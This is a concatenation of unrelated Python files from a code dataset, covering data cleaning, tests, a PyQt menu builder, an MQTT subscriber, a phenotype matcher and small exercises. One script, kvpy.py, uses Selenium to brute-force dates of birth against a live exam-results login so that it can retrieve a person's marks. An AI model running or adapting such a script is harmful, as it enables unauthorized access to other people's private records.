val_column.split(',')]\n selected_feat.extend(self.valCol)\n\n if (pteCol != None) :\n if convertTime:\n df[date_column] = convert_PTE_2_rt(df[date_column], df[pteCol])\n selected_feat.append(pteCol)\n self.pteCol = pteCol\n\n selected_feat.append(date_column)\n\n if created_time_column != None:\n selected_feat.append(created_time_column)\n\n self.file = df[selected_feat]\n\n self.dateCol = date_column\n self.fctTimeCol = created_time_column\n self.file[self.dateCol] = pd.to_datetime( self.file[self.dateCol] )\n self.periodByHour = periodByHour\n\n def pre_process_piepline(self):\n # if ('UTC' in self.dateCol) | ('utc' in self.dateCol):\n # self.convert_UTC_2_local( 'DeliveryDate', param.timezone )\n # self.file = self.file.drop( self.dateCol, axis = 1)\n # self.dateCol = 'DeliveryDate'\n # self.file[self.dateCol] = self.file[self.dateCol]\n\n self.remove_duplicate_forecast()\n\n def post_process_piepeline(self, scale_period = 4, interval = '0.25H'):\n # self.scale_forecast_frequency(scale_period, interval)\n self.insert_missing_time()\n self.extract_PTE()\n self.fill_nan_by_avg()\n return self.file\n\n def scale_forecast_freq_by_avg(self, interval, scale_period = 4):\n scaled_df = pd.DataFrame()\n self.file[self.valCol]/=scale_period\n\n print('scale forecast frequency by average')\n for index, row in self.file.iterrows():\n expected_datetime = pd.DatetimeIndex(start=self.file.iloc[index][self.dateCol], periods=self.periodByHour,\n freq=interval).values\n scaled_df = scaled_df.append([row]*self.periodByHour, ignore_index=True)\n scaled_df.iloc[self.periodByHour*index:(self.periodByHour*index+self.periodByHour)][self.dateCol] = expected_datetime\n\n if index % 1000 == 0:\n print('processed {}/{} rows'.format( index /1000 ,int(len(self.file)/1000)))\n\n self.file = scaled_df\n\n def scale_forecast_freq_by_copy(self, interval = '0.25H'):\n scaled_df = pd.DataFrame()\n print('scale forecast frequency by copy:')\n\n for index, row in self.file.iterrows():\n expected_datetime = pd.DatetimeIndex(start=self.file.iloc[index][self.dateCol], periods=self.periodByHour,\n freq=interval).values\n scaled_df = scaled_df.append([row]*self.periodByHour, ignore_index=True)\n scaled_df.iloc[self.periodByHour*index:(self.periodByHour*index+self.periodByHour)][self.dateCol] = expected_datetime\n\n if index % 1000 == 0:\n print('processed {}/{} rows'.format( index /1000 ,int(len(self.file)/1000)))\n\n self.file = scaled_df\n\n def insert_missing_time(self, interval='0.25H'):\n expected_datetime = pd.DatetimeIndex(start=self.file.iloc[0][self.dateCol], end=self.file.iloc[-1][self.dateCol],freq=interval)\n ideal_datetime_df = pd.DataFrame({self.dateCol: expected_datetime})\n\n self.file = ideal_datetime_df.merge(self.file, on=self.dateCol, how='left')\n # full_power_df[self.timeName] = pd.to_datetime(full_power_df[self.timeName])\n return self.file\n\n def extract_PTE(self):\n minutePerPTE = 60 / self.periodByHour\n raw_time = self.file[self.dateCol]\n pte = [int((t.hour*60 + t.minute)/minutePerPTE + 1) for t in raw_time]\n self.file['PTE'] = pte\n self.pteCol = 'PTE'\n\n def get_avg_values(self, valCol):\n avg_val_dict = {}\n\n for i in range(1,self.periodByHour*24+1):\n filteredPTEval = self.file[self.file[self.pteCol] == i][valCol].values\n filteredPTEval = [ 0 if (math.isnan(x) | math.isinf(x)) else x for x in filteredPTEval]\n avg_val_dict[i] = sum(filteredPTEval)/len(filteredPTEval)\n return avg_val_dict\n\n def fill_nan_by_avg(self, imputingCols = None):\n if imputingCols == None:\n imputingCols = self.valCol\n\n for col in imputingCols:\n self.file['missing_' + col] = [1 if (math.isnan(x)|math.isinf(x)) else 0 for x in self.file[col]]\n imputed_dict = self.get_avg_values(col)\n\n for pte in imputed_dict:\n imputed_val = imputed_dict[pte]\n pteFile = self.file[self.file[self.pteCol] == pte]\n impute_index = self.file.index[ (self.file[self.pteCol] == pte) & ( np.isnan(self.file[col])) | (np.isinf(self.file[col]))]\n self.file.loc[impute_index, col] = imputed_val\n\n def impute(self, splitHour = 4):\n self.file[self.valCol] /= splitHour\n cur_index = 1\n isMissing = []\n\n while cur_index <= len(self.file):\n\n PTE = self.file.loc[cur_index]['PTE']\n cur_row = self.file.loc[cur_index][self.valCol]\n last_row = self.file.loc[cur_index - 1][self.valCol]\n\n # assume the power forecast data is available/unavailable at the same time.\n if PTE % 4 == 1 & cur_row.isnull().any():\n # impute missing day\n isMissing.append(1)\n if cur_index >= param.max_PTE:\n last_day_data = self.file.loc[cur_index - param.max_PTE][self.valCol]\n impute_data = last_day_data\n self.file.loc[cur_index, self.valCol] = impute_data\n\n else:\n cur_index += 4\n continue\n\n elif PTE % 4 == 1:\n isMissing.append(0)\n impute_data = cur_row\n\n else:\n print(cur_index)\n print(cur_row)\n raise ValueError('Invalid missing values')\n\n isMissing.extend([0,0,0])\n self.file.loc[cur_index + 1, self.valCol] = impute_data\n self.file.loc[cur_index + 2, self.valCol] = impute_data\n self.file.loc[cur_index + 3, self.valCol] = impute_data\n cur_index += 4\n self.file['isMissing'] = isMissing\n\n def remove_duplicate_forecast(self):\n if self.fctTimeCol == None:\n pass\n\n # result = DataChecker( self.file ).check_duplicate_forecast( self.dateCol, self.fctTimeCol )\n result = DataChecker(self.file).check_duplicate_forecast(self.dateCol)\n\n if len(result>0):\n print('remove duplicates')\n self.file[self.fctTimeCol] = pd.to_datetime(self.file[self.fctTimeCol])\n self.file = self.file.loc[ self.file.groupby( self.dateCol)[self.fctTimeCol].idxmax().values ]\n self.file = self.file.sort_values(by=[self.dateCol], ascending=True)\n self.file = self.file.reset_index(drop=True)\n\n def convert_UTC_2_local(self, newColName, timezone):\n utc_time = self.file[self.dateCol]\n local_time = [pytz.utc.localize(t) for t in utc_time]\n am_dt = [t.astimezone(timezone) for t in local_time]\n discard_time_zone = [t._short_repr for t in am_dt]\n\n self.file[newColName] = discard_time_zone\n self.file[newColName] = pd.to_datetime( self.file[newColName] )\n","sub_path":"data_gathering/CleanData.py","file_name":"CleanData.py","file_ext":"py","file_size_in_byte":8052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"556826387","text":"import os\nimport sys\nimport unittest\n\nthis_path = os.path.dirname(os.path.realpath(__file__))\nos.chdir(this_path)\nsys.path.append(\"..\\\\\")\n\nfrom mock import MagicMock\nfrom test_runner.webtest import WebTest\n\ndriver = MagicMock()\nweb_test_path = os.path.join(this_path, r'web_tests\\web_test_1.py')\n\n\nclass UtilsTest(unittest.TestCase):\n def test_import_from_path(self):\n web_test = WebTest(driver, web_test_path)\n expected = ['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__',\n '__spec__', 'web_test_1', 'web_test_2']\n self.assertListEqual(expected, dir(web_test.module))\n\n def test_run_functions_in_module(self):\n web_test = WebTest(driver, web_test_path)\n mocked_module = MagicMock()\n mocked_module.__name__ = \"mock_web_test\"\n web_test.module = mocked_module\n\n _find_functions_in_module_mock = MagicMock(return_value=[\"func_1\", \"func_2\"])\n web_test._find_functions_in_module = _find_functions_in_module_mock\n web_test.run_functions_in_module()\n mocked_module.func_1.assert_called_once()\n mocked_module.func_2.assert_called_once()\n\n def test_run_functions_in_module_assert(self):\n web_test = WebTest(driver, web_test_path)\n expected = {'web_test_1': {'web_test_1': (True, False), 'web_test_2': (True, True)}}\n actual = web_test.run_functions_in_module()\n self.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unit_tests/webtest_test.py","file_name":"webtest_test.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"298297954","text":"import csv\nimport pandas as pd\nimport numpy as np\n\n\n\nfac_cols = ['name', 'degree', 'title', 'email']\nfac_table = pd.read_csv('faculty.csv', \n names = fac_cols, \n header = None, \n skiprows = [0] , \n skipinitialspace=True)\n\nemail = fac_table['email']\nemail.to_csv('UPenn_emails.csv', index = False, header = False)\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"340259694","text":"import requests\r\nimport bs4\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\n\r\noptions = Options()\r\noptions.add_argument('--headless')\r\noptions.add_argument('--disable-gpu') # Last I checked this was necessary.\r\nbrowser = webdriver.Chrome(chrome_options=options)\r\nroll = input()\r\nm = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']\r\nd = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31']\r\nyears = ['2001', '2000', '2002']\r\nfor year in years:\r\n\tfor i in m:\r\n\t\tfor j in d:\r\n\t\t\tbrowser.get(r\"http://kvpy.iisc.ernet.in/kvpy1718/checkMarks.php\")\r\n\t\t\trollno = browser.find_element_by_name(\"id\")\r\n\t\t\trollno.send_keys(roll)\r\n\t\t\tday = browser.find_element_by_name(\"dd\")\r\n\t\t\tmonth = browser.find_element_by_name(\"mm\")\r\n\t\t\tyearyyyy = browser.find_element_by_name(\"yyyy\")\r\n\t\t\tday.send_keys(j)\r\n\t\t\tmonth.send_keys(i)\r\n\t\t\tyearyyyy.send_keys(year)\r\n\t\t\tprint(j, \"-\", i,\"-\", year)\r\n\t\t\tsubmit = browser.find_element_by_xpath(\"/html/body/div/div[2]/form/input[5]\")\r\n\t\t\tsubmit.click()\r\n\t\t\tif browser.find_elements_by_css_selector('body > div > div:nth-child(8) > div:nth-child(5)'):\r\n\t\t\t\tprint(\"success\")\r\n\t\t\t\tbreak\r\n\r\n","sub_path":"kvpy.py","file_name":"kvpy.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"630459529","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom PyQt5.QtWidgets import (QApplication, \n QWidget, \n QTableWidget, \n QCheckBox, \n QLabel, \n QLineEdit, \n QPushButton,\n QHBoxLayout,\n QVBoxLayout)\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import Qt\n\nAPPPATHLIST = ('/usr/share/applications', )\nICONPATHLIST = ('/usr/share/app-install/icons/', '/usr/share/icons/', )\nICONPATH = '/usr/share/app-install/icons/'\nTEMPLATE = '''\nN += 1\nTILESET.append(InitTile())\nTILESET[N].tile = DesktopEntry\nTILESET[N].xy = (%d, %d)\nTILESET[N].extra = (%d, '%s', '%s')\n'''\nBEGIN = '''\n#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom TestTiles import *\nfrom AbstractTile import *\n \nTILESET = []\nN = -1\n\nclass InitTile():\n def __init__(self, tile=None, xy=(0, 0)):\n self.tile = tile\n self.xy = xy\n\nN += 1\nTILESET.append(InitTile())\nTILESET[N].tile = Close\nTILESET[N].xy = (-1, -1)\nTILESET[N].extra = None\n'''\nFILENAME = 'imports.py'\nCHECKALL = True\nW, H = 21, 9\nSIZE = 1\n\nclass Menumaker(QWidget):\n entries = []\n \n def __init__(self):\n super().__init__()\n self.initTable()\n gen = QPushButton('Generate')\n gen.clicked.connect(self.output)\n filename = QLineEdit(FILENAME)\n hbox0 = QHBoxLayout()\n hbox0.addWidget(gen)\n hbox0.addWidget(filename)\n save = QPushButton('Save')\n savefn = QLineEdit('TileMenuDesktopEntries.cfg')\n hbox1 = QHBoxLayout()\n hbox1.addWidget(save)\n hbox1.addWidget(savefn)\n load = QPushButton('Load')\n loadfn = QLineEdit('TileMenuDesktopEntries.cfg')\n hbox2 = QHBoxLayout()\n hbox2.addWidget(load)\n hbox2.addWidget(loadfn)\n vbox = QVBoxLayout()\n vbox.addWidget(self.table)\n vbox.addLayout(hbox1)\n vbox.addLayout(hbox2)\n vbox.addLayout(hbox0)\n self.setGeometry(300, 300, 960, 500)\n self.setLayout(vbox)\n self.show()\n\n def findEntries(self):\n desktopfiles = []\n for i in APPPATHLIST:\n try:\n lst = os.listdir(path=i)\n for j in lst:\n desktopfiles.append(i + '/' + j)\n except FileNotFoundError:\n pass \n self.entries = []\n i = 0\n for f in desktopfiles:\n file = open(f)\n params = {}\n for line in file:\n s = line.split('=')\n if s[0] == 'Icon' or s[0] == 'Exec' or s[0] == 'Name':\n params.update({s[0] : s[1][0:-1]})\n if params.get('Icon', None) == None:\n params['Icon'] = 'noicon'\n if params.get('Name', None) == None:\n params['Name'] = 'noname'\n if params.get('Exec', None) == None:\n params['Exec'] = 'true'\n params['On'] = CHECKALL\n s = SIZE\n x = i % W * s\n y = i // W * s\n params.update({'Size':s, 'x':x, 'y':y})\n params['Icon'] = self.iconPath(params['Icon'])\n self.entries.append(params)\n i += 1\n\n def output(self, filename):\n self.getEntriesFromTable()\n filename = 'test.py'\n out = open(filename, 'w') \n out.write(BEGIN)\n for e in self.entries:\n if e.get('Exec') != None and e.get('On'):\n out.write(TEMPLATE % (e['x'], e['y'], e['Size'], e.get('Exec', ''), e.get('Icon', '')))\n out.close()\n \n def initTable(self):\n self.findEntries()\n self.table = QTableWidget(len(self.entries), 4)\n self.table.setColumnWidth(0, self.table.rowHeight(0))\n self.table.setColumnWidth(1, 150)\n self.table.setColumnWidth(2, 300)\n self.table.setColumnWidth(3, 400)\n i = 0\n for e in self.entries:\n self.table.setCellWidget(i, 0, QCheckBox(''))\n self.table.cellWidget(i, 0).setCheckState(e['On'])\n self.table.cellWidget(i, 0).setTristate(False)\n self.table.setCellWidget(i, 1, QLabel(e['Name']))\n self.table.setCellWidget(i, 2, QLineEdit(e['Exec']))\n self.table.setCellWidget(i, 3, QLineEdit(e['Icon']))\n i += 1\n \n def getEntriesFromTable(self):\n for i in range(self.table.rowCount()):\n self.entries[i]['On'] = bool(self.table.cellWidget(i, 0).checkState())\n self.entries[i]['Exec'] = self.table.cellWidget(i, 2).text()\n self.entries[i]['Icon'] = self.table.cellWidget(i, 3).text()\n \n \nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = Menumaker()\n sys.exit(app.exec_())","sub_path":"makemenu.py","file_name":"makemenu.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"4881063","text":"class Persona:\n def __init__(self):\n self.nombre = \"\"\n self.edad = \"\"\n self.direccion = \"\"\n self.telefono = \"\"\n\n\nif __name__ == \"__main__\":\n persona = Persona()\n persona.nombre = input(\"nombre: \")\n persona.edad = input(\"edad: \")\n persona.direccion = input(\"direccion: \")\n persona.telefono = input(\"telefono: \")\n print(persona.nombre, \" vive en \", persona.direccion, \" tiene \", \n persona.edad, \" años y su tel es \", persona.telefono)\n","sub_path":"57031-porollan-santiago/tp1/copia_nueva/ej9_nuevo.py","file_name":"ej9_nuevo.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"163343542","text":"#!/usr/bin/python3\n\"\"\" class Square that defines a square AND validates size \"\"\"\n\n\nclass Square:\n \"\"\" Square with size verification\n Attributes:\n __size (int): Must be Integer type and >= 0\n \"\"\"\n __size = 0\n\n def __init__(self, size=0):\n \"\"\" Instantiate with proper size a Square object \"\"\"\n if type(size) != int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = size\n","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"174042217","text":"#!/usr/bin/python3\n\"\"\" N queens \"\"\"\nfrom sys import argv\n\nargc = len(argv)\nif (argc != 2):\n print('Usage: nqueens N')\n\nnum = argv[1]\ntry:\n num = int(num)\nexcept ValueError:\n print('N must be a number')\n exit(1)\n\nif num < 4:\n print(\"N must be at least 4\")\n exit(1)\n","sub_path":"0x0C-nqueens/0-nqueens.py","file_name":"0-nqueens.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"365439961","text":"import zipfile\nimport os\nimport math\n\nimport requests\nimport magic\n\nimport pandas as pd\nimport numpy as np\n\nclass FileData():\n def __init__(self, filename, entropy=None, filetype=None, size=None) -> None:\n self.filename = filename\n if not entropy:\n # Credit for entropy calculations: https://github.com/mattnotmax/entropy/blob/master/entropy.py\n with open(filename, 'rb') as f:\n byteArr = list(f.read())\n \n entropy = get_entropy(byteArr)\n\n self.entropy = entropy\n \n if not filetype:\n f = magic.Magic(mime=True, uncompress=True)\n filetype = f.from_file(filename)\n\n self.filetype = filetype\n\n if not size:\n size = os.path.getsize(filename)\n\n self.size = size\n \n def delete(self):\n os.remove(self.filename)\n\ndef get_entropy(contents, base=None):\n \"\"\" Computes entropy of label distribution. \"\"\"\n\n n_labels = len(contents)\n\n if n_labels <= 1:\n return 0\n\n value,counts = np.unique(contents, return_counts=True)\n probs = counts / n_labels\n n_classes = np.count_nonzero(probs)\n\n if n_classes <= 1:\n return 0\n\n ent = 0.\n\n # Compute entropy\n base = math.e if base is None else base\n for i in probs:\n ent -= i * math.log(i, base)\n\n return ent\n\n\nclass CompressionResult():\n def __init__(self, file_data, results) -> None:\n self.file = file_data\n self.results = results\n\n def best_result(self, best=\"ratio\"):\n if not self.results:\n return None\n \n best_result = self.results[0]\n for result in self.results:\n if best == \"ratio\" and result.Ratio < best_result.Ratio:\n best_result = result\n elif best == \"-ratio\" and result.Ratio > best_result.Ratio:\n best_result = result\n \n return best_result\n\ndef discover(path=\".\"):\n return [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\ndef download_file(url, unzip=False):\n files = []\n local_filename = url.split('/')[-1]\n with requests.get(url, stream=True) as r:\n r.raise_for_status()\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=8192): \n f.write(chunk)\n if not unzip:\n files.append(local_filename)\n \n if unzip:\n with zipfile.ZipFile(local_filename, 'r') as zip_ref:\n for name in zip_ref.namelist():\n zip_ref.extract(name, \".\")\n files.append(name)\n os.remove(local_filename)\n \n\n return files","sub_path":"ai/helpers/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"325269381","text":"import scipy as sp\nimport numpy as np\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\n\n\n#define a function here\ndef myfunc(x):\n return 2*x*x*x*x-6*x*x*x+8\n\n\nx0 = np.arange(1,3.5,.01)\n\n\nmin = minimize(myfunc,1)\n\n\nprint (\"Minimum of the function is : \",\"(\",min.x[0],min.fun,\")\" )\nplt.figure()\nplt.plot(x0,myfunc(x0),\"r\",label =\"Function\")\nplt.plot(min.x[0],min.fun,\"bo\",label = \"Minimum of Function\")\nplt.title(\"Function minimization using Scipy\")\nplt.xlabel(\"x\"+r\"$\\rightarrow$\")\nplt.ylabel(\"f(x)\"+r\"$\\rightarrow$\")\nplt.legend()\n\nplt.show()\n","sub_path":"python/Minimizer.py","file_name":"Minimizer.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"626111855","text":"from src.sqlite import conditioner_status_handler\nimport paho.mqtt.client as mqttc\n\n# MQTT Settings\nMQTT_Broker = \"test.mosquitto.org\"\nMQTT_Port = 1883\nKeep_Alive_Interval = 45\nMQTT_Topic = \"Home/Conditioner/Status\"\n\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"Connected OK\")\n client.subscribe(MQTT_Topic)\n else:\n print(\"Bad connection, RC = \", rc)\n\n\n# Save Data into DB Table\ndef on_message(client, userdata, msg):\n # This is the Master Call for saving MQTT Data into DB\n # For details of \"sensor_Data_Handler\" function please refer \"sensor_data_to_db.py\"\n print(\"MQTT Data Received...\")\n print(\"MQTT Topic: \" + msg.topic)\n print(\"Data\" + str(msg.payload))\n conditioner_status_handler(msg.topic, msg.payload)\n\n\ndef assign_callbacks_to_client(client):\n client.on_connect = on_connect\n client.on_message = on_message\n\n\ndef conditioner_subscribe():\n sub_clientA = mqttc.Client(client_id=\"clientgonnasubA\")\n if not sub_clientA.is_connected():\n sub_clientA.connect_async(MQTT_Broker, MQTT_Port)\n assign_callbacks_to_client(sub_clientA)\n sub_clientA.loop_start()\n","sub_path":"src/subscribers/conditioner.py","file_name":"conditioner.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"12885968","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/chiararasi/Documents/work/GITs/patientMatcher/patientMatcher/match/phenotype_matcher.py\n# Compiled at: 2019-04-25 09:29:38\n# Size of source mod 2**32: 7776 bytes\nimport os, logging\nfrom patientMatcher.parse.patient import features_to_hpo, disorders_to_omim\nfrom patientMatcher.resources import path_to_hpo_terms, path_to_phenotype_annotations\nfrom patient_similarity import HPO, Diseases, HPOIC, Patient\nfrom patient_similarity.__main__ import compare_patients\nLOG = logging.getLogger(__name__)\nPHENOTYPE_ROOT = 'HP:0000001'\n\ndef match(database, max_score, features, disorders):\n \"\"\"Handles phenotype matching algorithm\n\n Args:\n database(pymongo.database.Database)\n max_score(float): a number between 0 and 1\n features(list): a list of phenotype feature objects (example ID = HP:0008619)\n disorders(list): a list of OMIM diagnoses (example ID = MIM:616007 )\n\n Returns:\n matches(dict): a dictionary of patient matches with phenotype matching score\n \"\"\"\n matches = {}\n hpo_terms = []\n omim_terms = []\n query_fields = []\n hpoic = None\n hpo = None\n LOG.info('\\n\\n###### Running phenotype matcher module ######')\n if features:\n hpo_terms = features_to_hpo(features)\n query_fields.append({'features': {'$exists':True, '$ne':[]}})\n LOG.info('Creating HPO information content')\n hpo = HPO(path_to_hpo_terms, new_root=PHENOTYPE_ROOT)\n diseases = Diseases(path_to_phenotype_annotations)\n hpoic = HPOIC(hpo, diseases, orphanet=None, patients=False, use_disease_prevalence=False,\n use_phenotype_frequency=False,\n distribute_ic_to_leaves=False)\n if disorders:\n omim_terms = disorders_to_omim(disorders)\n query_fields.append({'disorders.id': {'$in': omim_terms}})\n if len(query_fields) > 0:\n query = {'$or': query_fields}\n LOG.info('Searching for patients in database with the following query:{}'.format(query))\n pheno_matching_patients = list(database['patients'].find(query))\n LOG.info(\"\\n\\nFOUND {} patients matching patients's phenotype tracts\\n\\n\".format(len(pheno_matching_patients)))\n for i in range(len(pheno_matching_patients)):\n patient = pheno_matching_patients[i]\n LOG.info('## Evaluating phenotype similarity with patient {} ##'.format(i + 1))\n similarity = evaluate_pheno_similariy(hpoic, hpo, hpo_terms, omim_terms, patient, max_score)\n match = {'patient_obj':patient, \n 'pheno_score':similarity}\n matches[patient['_id']] = match\n\n return matches\n\n\ndef evaluate_pheno_similariy(hpoic, hpo, hpo_terms, disorders, pheno_matching_patient, max_similarity):\n \"\"\"Evaluates the similarity of two patients based on phenotype features\n\n Args:\n hpoic(class) : the information content for the HPO\n hpo(class): an instance of the class for interacting with HPO\n hpo_terms(list): HPO terms of the query patient\n disorders(list): OMIM disorders of the query patient\n pheno_matching_patient(patient_obj): a patient object from the database\n max_similarity(float): a floating point number representing the highest value allowed for a feature\n\n Returns:\n patient_similarity(float): the computed phenotype similarity among the patients\n \"\"\"\n patient_similarity = 0\n hpo_score = 0\n omim_score = 0\n max_omim_score = 0\n max_hpo_score = 0\n matching_hpo_terms = features_to_hpo(pheno_matching_patient.get('features'))\n matching_omim_terms = disorders_to_omim(pheno_matching_patient.get('disorders'))\n if hpo_terms:\n if matching_hpo_terms:\n LOG.info('HPO terms available for comparison')\n if disorders:\n if matching_omim_terms:\n LOG.info('OMIM diagnoses available for comparison')\n max_omim_score = max_similarity / 2\n max_hpo_score = max_similarity / 2\n else:\n max_hpo_score = max_similarity\n hpo_score = similarity_wrapper(hpoic, hpo, max_hpo_score, hpo_terms, matching_hpo_terms)\n else:\n LOG.debug('Missing HPO terms, phenotype comparison based on OMIM diagnoses.')\n max_omim_score = max_similarity / 2\n if max_omim_score:\n omim_score = evaluate_subcategories(disorders, matching_omim_terms, max_omim_score)\n patient_similarity = hpo_score + omim_score\n LOG.info('patient phenotype score: {0} (OMIM:{1}, HPO:{2})'.format(patient_similarity, omim_score, hpo_score))\n return patient_similarity\n\n\ndef similarity_wrapper(hpoic, hpo, max_hpo_score, hpo_terms_q, hpo_terms_m):\n \"\"\"A wrapper around patient-similarity repository:\n https://github.com/buske/patient-similarity.\n\n Args:\n hpoic(class) : the information content for the HPO\n hpo(class): an instance of the class for interacting with HPO\n max_hpo_score(float): max score which can be assigned to HPO similarity\n hpo_terms_q(list): a list of HPO terms from query patient\n hpo_terms_m(list): a list of HPO terms from match patient\n\n Returns:\n score(float): simgic similarity score after HPO term comparison\n \"\"\"\n terms = set()\n for term_id in hpo_terms_q:\n term = hpo[term_id]\n if term:\n terms.add(term)\n\n query_patient = Patient(id='q', hp_terms=terms)\n terms = set()\n for term_id in hpo_terms_m:\n term = hpo[term_id]\n if term:\n terms.add(term)\n\n match_patient = Patient(id='m', hp_terms=terms)\n score_obj = compare_patients(hpoic=hpoic, patient1=query_patient, patient2=match_patient,\n scores=['simgic'])\n simgic_score = score_obj.get('simgic')\n LOG.info('patient-similarity module returned a simgic score of {}'.format(simgic_score))\n relative_simgic_score = simgic_score * max_hpo_score\n return relative_simgic_score\n\n\ndef evaluate_subcategories(list1, list2, max_score):\n \"\"\"returns a numerical representation of the similarity of two lists of strings\n\n Args:\n list1(list): a list of strings (this is a list of items from the query patient)\n list2(list): another list of strings (list of items from the patients in database)\n max_score(float): the maximum value to return if the lists are identical\n\n Returns:\n matching_score(float): a number reflecting the similarity between the lists\n \"\"\"\n matching_score = 0\n if len(list1) > 0:\n list_item_score = max_score / len(list1)\n n_shared_items = len(set(list1).intersection(list2))\n matching_score = n_shared_items * list_item_score\n return matching_score","sub_path":"pycfiles/patientMatcher-1.1.1.tar/phenotype_matcher.cpython-36.py","file_name":"phenotype_matcher.cpython-36.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"560932399","text":"#! /usr/bin/env python -m\n# -*- coding: utf-8 -*-\n# _____\n# / _ \\\n# / _/ \\ \\\n# / / \\_/ \\\n# / \\_/ _ \\ ___ _ ___ ___ ____ ____ ___ _____ _ _\n# \\ / \\_/ \\ / / _\\| | | __| / _ \\ | ┌┐ \\ | ┌┐ \\ / _ \\ |_ _|| | | |\n# \\ \\_/ \\_/ / | | | | | └─┐| |_| || └┘ / | └┘_/| |_| | | | | └─┘ |\n# \\ \\_/ / | |_ | |_ | ┌─┘| _ || |\\ \\ | | | _ | | | | ┌─┐ |\n# \\_____/ \\___/|___||___||_| |_||_| \\_\\|_| |_| |_| |_| |_| |_|\n# ROBOTICS™\n#\n# File: transports.py\n# Desc: Horizon Message Transport Controllers\n# \n# Copyright © 2010 Clearpath Robotics, Inc. \n# All Rights Reserved\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of Clearpath Robotics, Inc. nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \n# ARE DISCLAIMED. IN NO EVENT SHALL CLEARPATH ROBOTICS, INC. BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# Please send comments, questions, or patches to code@clearpathrobotics.com\n#\n\n\n\n\n################################################################################\n# Script\n\n\n\n# Check if run as a script\nif __name__ == \"__main__\":\n \n # Warn of Module ONLY status\n print (\"ERROR: clearpath.horizon.transports is a module and can NOT be run\"\\\n \" as a script!\\nFor a command-line interface demo of Horizon, run:\"\\\n \"\\n python -m clearpath.horizon.demo\\n\"\\\n \"For Horizon message forwarding, run:\\n\"\\\n \" python -m clearpath.horizon.forward\")\n\n # Exit Error\n import sys\n sys.exit(1)\n\n\n\n\n################################################################################\n# Module\n\n\n\n ## @package clearpath.horizon.transports \n# Horizon Transports Python Module\n# \n# Horizon Message Transport Controllers \\n\n# Supported Horizon version(s): 0.1 - 1.0 \\n\n# \\n\n# Supported Transports:\n# - Serial (RS-232)\n#\n# @author Ryan Gariepy\n# @author Malcolm Robert\n# @date 